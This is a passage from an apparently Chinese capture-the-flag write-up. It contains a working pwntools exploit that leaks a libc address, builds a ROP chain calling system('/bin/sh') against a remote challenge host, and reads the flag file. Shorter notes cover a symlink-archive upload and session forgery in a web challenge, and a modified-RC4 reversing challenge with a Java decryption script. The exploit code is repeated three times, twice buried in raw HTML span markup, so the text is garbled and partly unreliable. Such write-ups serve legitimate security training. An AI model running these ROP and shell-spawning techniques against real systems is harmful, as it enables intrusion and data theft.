leaf=""><br></span><span leaf="">数据</span><span leaf=""><br></span><span leaf="">receive_until_delim = lambda delims, drop=True: io.recvuntil(delims, drop) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收</span></span><span leaf=""><br></span><span leaf="">数据直到遇到 delims</span><span leaf=""><br></span><span leaf="">unpack_32bit = lambda data: u32(data.ljust(4, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'x00'</span></span><span leaf="">)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 将数据解析为 32 位无符</span></span><span leaf=""><br></span><span leaf="">号整数</span><span leaf=""><br></span><span leaf="">unpack_64bit = lambda data: u64(data.ljust(8, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'x00'</span></span><span leaf="">)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 将数据解析为 64 位无符</span></span><span leaf=""><br></span><span leaf="">号整数</span><span leaf=""><br></span><span leaf="">enter_interactive_mode = lambda: io.interactive() </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 进入交互模式</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 连接到远程服务器</span></span><span leaf=""><br></span><span leaf="">io = remote(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'59.110.162.87'</span></span><span leaf="">, 30743)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收泄露的地址并计算 libc 基地址</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'A gift: '</span></span><span leaf="">)</span><span leaf=""><br></span><span leaf="">leaked_address = int(receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'n'</span></span><span leaf="">), 16) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 读取泄露的地址</span></span><span leaf=""><br></span><span leaf="">libc_base_address = leaked_address - libc_binary.sym.setvbuf </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 计算 libc 基地址</span></span><span leaf=""><br></span><span leaf="">log.info(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"libc_base_address = "</span></span><span leaf=""> + hex(libc_base_address)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 打印 libc 基地址</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 选择菜单选项</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'Choose onen1. Boyn2. Girln'</span></span><span leaf="">)</span><span leaf=""><br></span><span leaf="">send_line_data(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'2'</span></span><span leaf="">) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 选择 Girl</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'2. Tomboyn'</span></span><span leaf="">)</span><span leaf=""><br></span><span leaf="">send_line_data(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'2'</span></span><span leaf="">) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 选择 Tomboy</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'certificaten'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 构造 ROP 链</span></span><span leaf=""><br></span><span leaf="">pop_rdi_gadget = libc_base_address + 0x000000000010f75b </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># pop rdi; ret 的地址</span></span><span leaf=""><br></span><span leaf="">ret_gadget = 0x000000000040201a </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># ret 指令的地址</span></span><span leaf=""><br></span><span leaf="">system_function_address = libc_binary.sym.system + libc_base_address </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># system 函</span></span><span leaf=""><br></span><span leaf="">数的地址</span><span leaf=""><br></span><span leaf="">bin_sh_string_address = next(libc_binary.search(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'/bin/sh'</span></span><span leaf="">)) + libc_base_address </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># </span></span><span leaf=""><br></span><span leaf="">/bin/sh 字符串的地址</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送 payload</span></span><span leaf=""><br></span><span leaf="">send_line_data(p64(0x0004025E6)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'If you think you'</span></span><span leaf="">)</span><span leaf=""><br></span><span leaf="">send_data(b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'a'</span></span><span leaf=""> * 0x18 + p64(pop_rdi_gadget) + p64(bin_sh_string_address) + </span><span leaf=""><br></span><span leaf="">p64(ret_gadget) + p64(system_function_address)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 构造 ROP 链</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 进入交互模式</span></span><span leaf=""><br></span><span leaf="">enter_interactive_mode()</span><span leaf=""><br></span>
<span leaf="">from pwn import *</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 加载二进制文件和 libc</span></span><span leaf=""><br></span><span leaf="">binary_path = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'./pwn'</span></span><span leaf=""><br></span><span leaf="">elf_binary = ELF(binary_path)</span><span leaf=""><br></span><span leaf="">libc_binary = ELF(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'./libc.so.6'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 设置日志级别、架构和终端</span></span><span leaf=""><br></span><span leaf="">context.log_level = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'debug'</span></span><span leaf=""><br></span><span leaf="">context.arch = elf_binary.arch</span><span leaf=""><br></span><span leaf="">context.terminal = [</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'tmux'</span></span><span leaf="">, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'neww'</span></span><span leaf="">]</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 定义工具函数</span></span><span leaf=""><br></span><span leaf="">send_data = lambda data: io.send(data) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送数据</span></span><span leaf=""><br></span><span leaf="">send_after_delim = lambda delim, data: io.sendafter(delim, data) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 在接收到 delim </span></span><span leaf=""><br></span><span leaf="">后发送数据</span><span leaf=""><br></span><span leaf="">send_line_data = lambda data: io.sendline(data) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送一行数据</span></span><span leaf=""><br></span><span leaf="">send_line_after_delim = lambda delim, data: io.sendlineafter(delim, data) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 在接收</span></span><span leaf=""><br></span><span leaf="">到 delim 后发送一行数据</span><span leaf=""><br></span><span leaf="">receive_data = lambda num_bytes=4096: io.recv(num_bytes) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收指定字节数的</span></span><span leaf=""><br></span><span leaf="">数据</span><span leaf=""><br></span><span leaf="">receive_until_delim = lambda delims, drop=True: io.recvuntil(delims, drop) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收</span></span><span leaf=""><br></span><span leaf="">数据直到遇到 delims</span><span leaf=""><br></span><span leaf="">unpack_32bit = lambda data: u32(data.ljust(4, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'x00'</span></span><span leaf="">)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 将数据解析为 32 位无符</span></span><span leaf=""><br></span><span leaf="">号整数</span><span leaf=""><br></span><span leaf="">unpack_64bit = lambda data: u64(data.ljust(8, </span><span style="color: #98c379;line-height: 26px;"><span leaf="">'x00'</span></span><span leaf="">)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 将数据解析为 64 位无符</span></span><span leaf=""><br></span><span leaf="">号整数</span><span leaf=""><br></span><span leaf="">enter_interactive_mode = lambda: io.interactive() </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 进入交互模式</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 连接到远程服务器</span></span><span leaf=""><br></span><span leaf="">io = remote(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'59.110.162.87'</span></span><span leaf="">, 30743)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 接收泄露的地址并计算 libc 基地址</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'A gift: '</span></span><span leaf="">)</span><span leaf=""><br></span><span leaf="">leaked_address = int(receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'n'</span></span><span leaf="">), 16) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 读取泄露的地址</span></span><span leaf=""><br></span><span leaf="">libc_base_address = leaked_address - libc_binary.sym.setvbuf </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 计算 libc 基地址</span></span><span leaf=""><br></span><span leaf="">log.info(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"libc_base_address = "</span></span><span leaf=""> + hex(libc_base_address)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 打印 libc 基地址</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 选择菜单选项</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'Choose onen1. Boyn2. Girln'</span></span><span leaf="">)</span><span leaf=""><br></span><span leaf="">send_line_data(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'2'</span></span><span leaf="">) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 选择 Girl</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'2. Tomboyn'</span></span><span leaf="">)</span><span leaf=""><br></span><span leaf="">send_line_data(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'2'</span></span><span leaf="">) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 选择 Tomboy</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'certificaten'</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 构造 ROP 链</span></span><span leaf=""><br></span><span leaf="">pop_rdi_gadget = libc_base_address + 0x000000000010f75b </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># pop rdi; ret 的地址</span></span><span leaf=""><br></span><span leaf="">ret_gadget = 0x000000000040201a </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># ret 指令的地址</span></span><span leaf=""><br></span><span leaf="">system_function_address = libc_binary.sym.system + libc_base_address </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># system 函</span></span><span leaf=""><br></span><span leaf="">数的地址</span><span leaf=""><br></span><span leaf="">bin_sh_string_address = next(libc_binary.search(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'/bin/sh'</span></span><span leaf="">)) + libc_base_address </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># </span></span><span leaf=""><br></span><span leaf="">/bin/sh 字符串的地址</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送 payload</span></span><span leaf=""><br></span><span leaf="">send_line_data(p64(0x0004025E6)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 发送</span></span><span leaf=""><br></span><span leaf="">receive_until_delim(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'If you think you'</span></span><span leaf="">)</span><span leaf=""><br></span><span leaf="">send_data(b</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'a'</span></span><span leaf=""> * 0x18 + p64(pop_rdi_gadget) + p64(bin_sh_string_address) + </span><span leaf=""><br></span><span leaf="">p64(ret_gadget) + p64(system_function_address)) </span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 构造 ROP 链</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 进入交互模式</span></span><span leaf=""><br></span><span leaf="">enter_interactive_mode()</span><span leaf=""><br></span>
from pwn import *
# 加载二进制文件和 libc
binary_path = './pwn'
elf_binary = ELF(binary_path)
libc_binary = ELF('./libc.so.6')
# 设置日志级别、架构和终端
context.log_level = 'debug'
context.arch = elf_binary.arch
context.terminal = ['tmux', 'neww']
# 定义工具函数
send_data = lambda data: io.send(data) # 发送数据
send_after_delim = lambda delim, data: io.sendafter(delim, data) # 在接收到 delim 
后发送数据
send_line_data = lambda data: io.sendline(data) # 发送一行数据
send_line_after_delim = lambda delim, data: io.sendlineafter(delim, data) # 在接收
到 delim 后发送一行数据
receive_data = lambda num_bytes=4096: io.recv(num_bytes) # 接收指定字节数的
数据
receive_until_delim = lambda delims, drop=True: io.recvuntil(delims, drop) # 接收
数据直到遇到 delims
unpack_32bit = lambda data: u32(data.ljust(4, 'x00')) # 将数据解析为 32 位无符
号整数
unpack_64bit = lambda data: u64(data.ljust(8, 'x00')) # 将数据解析为 64 位无符
号整数
enter_interactive_mode = lambda: io.interactive() # 进入交互模式
# 连接到远程服务器
io = remote('59.110.162.87', 30743)
# 接收泄露的地址并计算 libc 基地址
receive_until_delim('A gift: ')
leaked_address = int(receive_until_delim('n'), 16) # 读取泄露的地址
libc_base_address = leaked_address - libc_binary.sym.setvbuf # 计算 libc 基地址
log.info("libc_base_address = " + hex(libc_base_address)) # 打印 libc 基地址
# 选择菜单选项
receive_until_delim('Choose onen1. Boyn2. Girln')
send_line_data('2') # 选择 Girl
receive_until_delim('2. Tomboyn')
send_line_data('2') # 选择 Tomboy
receive_until_delim('certificaten')
# 构造 ROP 链
pop_rdi_gadget = libc_base_address + 0x000000000010f75b # pop rdi; ret 的地址
ret_gadget = 0x000000000040201a # ret 指令的地址
system_function_address = libc_binary.sym.system + libc_base_address # system 函
数的地址
bin_sh_string_address = next(libc_binary.search('/bin/sh')) + libc_base_address # 
/bin/sh 字符串的地址
# 发送 payload
send_line_data(p64(0x0004025E6)) # 发送
receive_until_delim('If you think you')
send_data(b'a' * 0x18 + p64(pop_rdi_gadget) + p64(bin_sh_string_address) + 
p64(ret_gadget) + p64(system_function_address)) # 构造 ROP 链
# 进入交互模式
enter_interactive_mode()

进入 shell 后直接 cat /home/ctf/flag

<span leaf="">flag{161eaaf4-4214-422d-83df-255dbc16b228}</span><span leaf=""><br></span>
<span leaf="">flag{161eaaf4-4214-422d-83df-255dbc16b228}</span><span leaf=""><br></span>
flag{161eaaf4-4214-422d-83df-255dbc16b228}

Gotar

软链接，先创建一个文件夹，进入那个文件夹然后构造软链接，然后再压缩文件夹

然后上传访问/assets/extracted/2/gioisi，得到 session

伪造得到 flag

ko0h

用 ida 打开

直接看 main 解变表 base64 的话是假的 flag

去花之后跟进里面调用的函数，一个个去花 最后发现是个魔改 rc4 才是正确 flag 的加密逻辑

改 rc4 是将原来的异或换成了减，所以 exp 改成加就可以

<span leaf="">public class RC4 {</span><span leaf=""><br></span><span leaf=""> /**</span><span leaf=""><br></span><span leaf="">* 初始化 RC4 算法的状态向量 S 盒</span><span leaf=""><br></span><span leaf=""> *</span><span leaf=""><br></span><span leaf="">* @param s 状态向量 S 盒，长度为 256</span><span leaf=""><br></span><span leaf="">* @param key 密钥</span><span leaf=""><br></span><span leaf="">* @param len_k 密钥长度</span><span leaf=""><br></span><span leaf=""> */ public static void rc4_init(int[] s, byte[] key, int </span><span leaf=""><br></span><span leaf="">len_k) { int i = 0, j = 0; byte[] k = new byte[256]; </span><span leaf=""><br></span><span leaf="">int tmp = 0;</span><span leaf=""><br></span><span leaf=""> // 初始化 S 盒和临时密钥数组 k</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (i = 0; i < 256; i++) </span><span leaf=""><br></span><span leaf="">{ s[i] = i;</span><span leaf=""><br></span><span leaf=""> k[i] = key[i % len_k];</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> // 对 S 盒进行置换操作</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (i = 0; i < 256; i++) {</span><span leaf=""><br></span><span leaf=""> j = (j + s[i] + (k[i] & 0xFF)) % 256; </span><span leaf=""><br></span><span leaf="">tmp = s[i]; s[i] = s[j]; s[j] = tmp;</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> /**</span><span leaf=""><br></span><span leaf="">* 使用 RC4 算法对数据进行加密或解密</span><span leaf=""><br></span><span leaf=""> *</span><span leaf=""><br></span><span leaf="">* @param data 待处理的数据</span><span leaf=""><br></span><span leaf="">* @param len_d 数据长度</span><span leaf=""><br></span><span leaf="">* @param key 密钥</span><span leaf=""><br></span><span leaf="">* @param len_k 密钥长度</span><span leaf=""><br></span><span leaf=""> */ public static void rc4_crypt(byte[] data, int len_d, byte[] key, int </span><span leaf=""><br></span><span leaf="">len_k) { int[] s = new int[256]; rc4_init(s, key, len_k);</span><span leaf=""><br></span><span leaf=""> int i = 0, j = 0, t = 0; </span><span leaf=""><br></span><span leaf="">int k = 0; int tmp;</span><span leaf=""><br></span><span leaf=""> // 对数据进行逐字节处理</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (k = 0; k < len_d; k++) </span><span leaf=""><br></span><span leaf="">{ i = (i + 1) % 256; j = </span><span leaf=""><br></span><span leaf="">(j + s[i]) % 256; tmp = s[i]; </span><span leaf=""><br></span><span leaf="">s[i] = s[j]; s[j] = tmp; </span><span leaf=""><br></span><span leaf="">t = (s[i] + s[j]) % 256; data[k] </span><span leaf=""><br></span><span leaf="">+= (byte) s[t];</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> public static void main(String[] args) { byte[] </span><span leaf=""><br></span><span leaf="">key = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">"DDDDAAAASSSS"</span></span><span leaf="">.getBytes(); int </span><span leaf=""><br></span><span leaf="">key_len = key.length;</span><span leaf=""><br></span><span leaf=""> byte[] data = {</span><span leaf=""><br></span><span leaf=""> 0x18, 0x9C, 0x47, 0x3D, 0x3B, 0xE1, 0x29, 0x27, 0x9F, 0x34, 0x83, 0xD5,</span><span leaf=""><br></span><span leaf=""> (byte) 0xED, (byte) 0xB5, 0x6E, 0x59,</span><span leaf=""><br></span><span leaf=""> 0x7F, (byte) 0xDE, 0x47, (byte) 0xD7, 0x65, 0x3F, 0x7A, 0x33, 0x5B, 0x64, </span><span leaf=""><br></span><span leaf="">0xB6, (byte) 0xFA,</span><span leaf=""><br></span><span leaf=""> 0x94, 0x55, 0x87, 0x42,</span><span leaf=""><br></span><span leaf=""> 0x20, 0x06, 0x0C, 0x69, (byte) 0xFE, 0x72, 0xA9, 0xE4, 0xD1, 0x7C };</span><span leaf=""><br></span><span leaf=""> rc4_crypt(data, data.length, key, key_len);</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (int i = 0; i < data.length; i++) {</span><span leaf=""><br></span><span leaf=""> System.out.print(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"0x"</span></span><span leaf=""> + String.format(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"%02X"</span></span><span leaf="">, data[i]) + </span><span style="color: #98c379;line-height: 26px;"><span leaf="">","</span></span><span leaf="">);</span><span leaf=""><br></span><span leaf=""> System.out.print((char) (data[i] & 0xFF)); }</span><span leaf=""><br></span><span leaf=""><br></span><span leaf="">}</span><span leaf=""><br></span><span leaf="">}</span><span leaf=""><br></span>
<span leaf="">public class RC4 {</span><span leaf=""><br></span><span leaf=""> /**</span><span leaf=""><br></span><span leaf="">* 初始化 RC4 算法的状态向量 S 盒</span><span leaf=""><br></span><span leaf=""> *</span><span leaf=""><br></span><span leaf="">* @param s 状态向量 S 盒，长度为 256</span><span leaf=""><br></span><span leaf="">* @param key 密钥</span><span leaf=""><br></span><span leaf="">* @param len_k 密钥长度</span><span leaf=""><br></span><span leaf=""> */ public static void rc4_init(int[] s, byte[] key, int </span><span leaf=""><br></span><span leaf="">len_k) { int i = 0, j = 0; byte[] k = new byte[256]; </span><span leaf=""><br></span><span leaf="">int tmp = 0;</span><span leaf=""><br></span><span leaf=""> // 初始化 S 盒和临时密钥数组 k</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (i = 0; i < 256; i++) </span><span leaf=""><br></span><span leaf="">{ s[i] = i;</span><span leaf=""><br></span><span leaf=""> k[i] = key[i % len_k];</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> // 对 S 盒进行置换操作</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (i = 0; i < 256; i++) {</span><span leaf=""><br></span><span leaf=""> j = (j + s[i] + (k[i] & 0xFF)) % 256; </span><span leaf=""><br></span><span leaf="">tmp = s[i]; s[i] = s[j]; s[j] = tmp;</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> /**</span><span leaf=""><br></span><span leaf="">* 使用 RC4 算法对数据进行加密或解密</span><span leaf=""><br></span><span leaf=""> *</span><span leaf=""><br></span><span leaf="">* @param data 待处理的数据</span><span leaf=""><br></span><span leaf="">* @param len_d 数据长度</span><span leaf=""><br></span><span leaf="">* @param key 密钥</span><span leaf=""><br></span><span leaf="">* @param len_k 密钥长度</span><span leaf=""><br></span><span leaf=""> */ public static void rc4_crypt(byte[] data, int len_d, byte[] key, int </span><span leaf=""><br></span><span leaf="">len_k) { int[] s = new int[256]; rc4_init(s, key, len_k);</span><span leaf=""><br></span><span leaf=""> int i = 0, j = 0, t = 0; </span><span leaf=""><br></span><span leaf="">int k = 0; int tmp;</span><span leaf=""><br></span><span leaf=""> // 对数据进行逐字节处理</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (k = 0; k < len_d; k++) </span><span leaf=""><br></span><span leaf="">{ i = (i + 1) % 256; j = </span><span leaf=""><br></span><span leaf="">(j + s[i]) % 256; tmp = s[i]; </span><span leaf=""><br></span><span leaf="">s[i] = s[j]; s[j] = tmp; </span><span leaf=""><br></span><span leaf="">t = (s[i] + s[j]) % 256; data[k] </span><span leaf=""><br></span><span leaf="">+= (byte) s[t];</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> }</span><span leaf=""><br></span><span leaf=""> public static void main(String[] args) { byte[] </span><span leaf=""><br></span><span leaf="">key = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">"DDDDAAAASSSS"</span></span><span leaf="">.getBytes(); int </span><span leaf=""><br></span><span leaf="">key_len = key.length;</span><span leaf=""><br></span><span leaf=""> byte[] data = {</span><span leaf=""><br></span><span leaf=""> 0x18, 0x9C, 0x47, 0x3D, 0x3B, 0xE1, 0x29, 0x27, 0x9F, 0x34, 0x83, 0xD5,</span><span leaf=""><br></span><span leaf=""> (byte) 0xED, (byte) 0xB5, 0x6E, 0x59,</span><span leaf=""><br></span><span leaf=""> 0x7F, (byte) 0xDE, 0x47, (byte) 0xD7, 0x65, 0x3F, 0x7A, 0x33, 0x5B, 0x64, </span><span leaf=""><br></span><span leaf="">0xB6, (byte) 0xFA,</span><span leaf=""><br></span><span leaf=""> 0x94, 0x55, 0x87, 0x42,</span><span leaf=""><br></span><span leaf=""> 0x20, 0x06, 0x0C, 0x69, (byte) 0xFE, 0x72, 0xA9, 0xE4, 0xD1, 0x7C };</span><span leaf=""><br></span><span leaf=""> rc4_crypt(data, data.length, key, key_len);</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (int i = 0; i < data.length; i++) {</span><span leaf=""><br></span><span leaf=""> System.out.print(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"0x"</span></span><span leaf=""> + String.format(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"%02X"</span></span><span leaf="">, data[i]) + </span><span style="color: #98c379;line-height: 26px;"><span leaf="">","</span></span><span leaf="">);</span><span leaf=""><br></span><span leaf=""> System.out.print((char) (data[i] & 0xFF)); }</span><span leaf=""><br></span><span leaf=""><br></span><span leaf="">}</span><span leaf=""><br></span><span leaf="">}</span><span leaf=""><br></span>
public class RC4 {
 /**
* 初始化 RC4 算法的状态向量 S 盒
 *
* @param s 状态向量 S 盒，长度为 256
* @param key 密钥
* @param len_k 密钥长度
 */ public static void rc4_init(int[] s, byte[] key, int 
len_k) { int i = 0, j = 0; byte[] k = new byte[256]; 
int tmp = 0;
 // 初始化 S 盒和临时密钥数组 k
for (i = 0; i < 256; i++) 
{ s[i] = i;
 k[i] = key[i % len_k];
 }
 // 对 S 盒进行置换操作
for (i = 0; i < 256; i++) {
 j = (j + s[i] + (k[i] & 0xFF)) % 256; 
tmp = s[i]; s[i] = s[j]; s[j] = tmp;
 }
 }
 /**
* 使用 RC4 算法对数据进行加密或解密
 *
* @param data 待处理的数据
* @param len_d 数据长度
* @param key 密钥
* @param len_k 密钥长度
 */ public static void rc4_crypt(byte[] data, int len_d, byte[] key, int 
len_k) { int[] s = new int[256]; rc4_init(s, key, len_k);
 int i = 0, j = 0, t = 0; 
int k = 0; int tmp;
 // 对数据进行逐字节处理
for (k = 0; k < len_d; k++) 
{ i = (i + 1) % 256; j = 
(j + s[i]) % 256; tmp = s[i]; 
s[i] = s[j]; s[j] = tmp; 
t = (s[i] + s[j]) % 256; data[k] 
+= (byte) s[t];
 }
 }
 public static void main(String[] args) { byte[] 
key = "DDDDAAAASSSS".getBytes(); int 
key_len = key.length;
 byte[] data = {
 0x18, 0x9C, 0x47, 0x3D, 0x3B, 0xE1, 0x29, 0x27, 0x9F, 0x34, 0x83, 0xD5,
 (byte) 0xED, (byte) 0xB5, 0x6E, 0x59,
 0x7F, (byte) 0xDE, 0x47, (byte) 0xD7, 0x65, 0x3F, 0x7A, 0x33, 0x5B, 0x64, 
0xB6, (byte) 0xFA,
 0x94, 0x55, 0x87, 0x42,
 0x20, 0x06, 0x0C, 0x69, (byte) 0xFE, 0x72, 0xA9, 0xE4, 0xD1, 0x7C };
 rc4_crypt(data, data.length, key, key_len);
for (int i = 0; i < data.length; i++) {
 System.out.print("0x" + String.format("%02X", data[i]) + ",");
 System.out.print((char) (data[i] & 0xFF)); }

}
}